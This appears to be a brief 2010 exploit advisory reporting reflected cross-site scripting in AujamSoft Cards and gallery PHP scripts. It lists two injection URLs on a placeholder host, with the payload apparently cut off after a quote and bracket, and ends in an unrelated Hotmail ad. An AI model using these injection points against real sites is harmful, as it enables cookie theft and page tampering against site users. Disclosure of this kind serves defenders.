# Exploit Title: [AujamSoft Cards/gallery XSS] # Date: [June:20:2010 as my laptop Date!] # Author: Str1k3r # Tested on: [PHP5] # Version: [There only One Version] #exploit: www.site.com/cards/?p=all&id=19"> www.site.com/gallery/item.php?id=1&catp=1"> _________________________________________________________________ The New Busy is not the too busy. Combine all your e-mail accounts with Hotmail. http://www.windowslive.com/campaign/thenewbusy?tile=multiaccount&ocid=PID28326::T:WLMTAGL:ON:WL:en-US:WM_HMP:042010_4